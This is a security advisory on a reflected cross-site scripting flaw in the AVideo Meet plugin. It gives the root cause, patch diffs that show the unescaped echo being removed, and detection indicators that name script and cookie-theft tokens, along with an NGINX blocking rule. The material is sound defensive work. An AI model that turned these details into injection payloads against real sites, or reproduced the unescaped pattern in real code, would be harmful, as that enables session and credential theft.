CVE-2026-43878 Overview
CVE-2026-43878 is a reflected cross-site scripting (XSS) vulnerability in WWBN AVideo, an open source video platform. The flaw resides in plugin/Meet/iframe.php, which echoes the attacker-controlled user and pass query parameters unescaped into a JavaScript double-quoted string literal inside a <script> block. An attacker can craft a URL that breaks out of the string and executes arbitrary JavaScript in the victim's browser under the AVideo origin. The issue affects WWBN AVideo versions up to and including 29.0 and requires no authentication when a public Meet schedule exists on the target instance. The vulnerability is tracked as [CWE-79] (Improper Neutralization of Input During Web Page Generation).
Critical Impact
Unauthenticated attackers can hijack AVideo user sessions, steal credentials, and perform actions in the context of any visitor lured to a crafted Meet iframe URL.
Affected Products
- WWBN AVideo versions up to and including 29.0
- WWBN AVideo Meet plugin (plugin/Meet/iframe.php)
- AVideo instances with a public Meet schedule enabled
Discovery Timeline
- 2026-05-11 - CVE-2026-43878 published to NVD
- 2026-05-12 - Last updated in NVD database
Technical Details for CVE-2026-43878
Vulnerability Analysis
The Meet plugin generates a small JavaScript shim that redirects the iframe after the meeting closes. The $readyToClose variable, derived from request parameters including user and pass, is interpolated directly into a double-quoted JavaScript string within a <script> tag. Because the value is neither HTML-encoded nor JavaScript-escaped, an attacker can supply input containing a closing quote and arbitrary script content. The injected script executes in the AVideo origin, granting access to session cookies, the DOM, and authenticated API endpoints on the platform.
Root Cause
The root cause is unsafe templating of untrusted input into a JavaScript context. The original code used PHP's echo against a value composed from $_REQUEST['user'] and $_REQUEST['pass'] without sanitization. String concatenation in PHP combined with echo inside a <script> block creates a sink that is reachable without authentication when a public Meet schedule is present, satisfying the conditions for reflected XSS.
Attack Vector
The attacker delivers a crafted URL to the victim through phishing, chat, or any link-sharing channel. When the victim loads the Meet iframe URL, the server reflects the attacker payload into the inline script. The injected JavaScript runs with the privileges of the victim, enabling session theft, forced actions, and credential harvesting against the AVideo origin.
// Patch in plugin/Meet/iframe.php
function _readyToClose() {
- document.location = "<?php echo $readyToClose; ?>";
+ document.location = <?php echo json_encode($readyToClose, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT); ?>;
}
The fix replaces direct echo with json_encode using JSON_HEX_TAG, JSON_HEX_AMP, JSON_HEX_APOS, and JSON_HEX_QUOT flags, which safely encode the value for a JavaScript context. A companion change in objects/user.php wraps credentials with rawurlencode before building the query string:
// Patch in objects/user.php
-$return = "user={$_REQUEST['user']}&pass={$_REQUEST['pass']}";
+$return = "user=" . rawurlencode((string) $_REQUEST['user']) . "&pass=" . rawurlencode((string) $_REQUEST['pass']);
Source: WWBN AVideo Commit 3298ced
Detection Methods for CVE-2026-43878
Indicators of Compromise
- Web server access logs containing requests to plugin/Meet/iframe.php with user or pass query parameters containing quotation marks, angle brackets, or JavaScript keywords such as <script>, onerror=, or document.cookie.
- URL-encoded payloads in user or pass parameters such as %22, %3C, or %3E directed at the Meet iframe endpoint.
- Outbound browser requests from authenticated AVideo sessions to attacker-controlled domains shortly after visiting a Meet URL.
Detection Strategies
- Inspect HTTP request logs for anomalous query strings targeting plugin/Meet/iframe.php, focusing on length, encoding, and presence of script-like tokens.
- Deploy a web application firewall (WAF) rule that blocks requests where user or pass parameters contain reflected XSS signatures.
- Correlate referrer headers and user-agent patterns to identify mass distribution of crafted Meet URLs.
Monitoring Recommendations
- Enable Content Security Policy (CSP) reporting to capture inline script violations originating from the AVideo origin.
- Alert on authentication events that follow a Meet iframe page load from an external referrer.
- Centralize and retain web server logs for forensic review of reflected XSS attempts.
How to Mitigate CVE-2026-43878
Immediate Actions Required
- Upgrade WWBN AVideo to a release containing commit 3298ced2bcf92e4f3acff6ce9bde14edf42ecb5b or later.
- Audit existing public Meet schedules and remove or restrict any that are not required to be publicly accessible.
- Rotate session secrets and force re-authentication if exploitation is suspected.
Patch Information
The upstream fix is published in commit 3298ced2bcf92e4f3acff6ce9bde14edf42ecb5b. It introduces json_encode with hex-encoding flags around the reflected value in plugin/Meet/iframe.php and wraps credentials with rawurlencode in objects/user.php. See the WWBN AVideo Security Advisory GHSA-mm5f-8q57-4fc4 for vendor guidance.
Workarounds
- Restrict access to plugin/Meet/iframe.php at the reverse proxy or WAF level, blocking requests that include user or pass query parameters containing quotes or angle brackets.
- Disable the Meet plugin until the patch is applied if it is not required for operations.
- Enforce a strict Content Security Policy that disallows inline script execution to reduce reflected XSS impact.
# Example NGINX rule to block suspicious Meet iframe requests
location ~ ^/plugin/Meet/iframe\.php$ {
if ($args ~* "(user|pass)=[^&]*(%22|%3C|%3E|\"|<|>)") {
return 403;
}
}
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
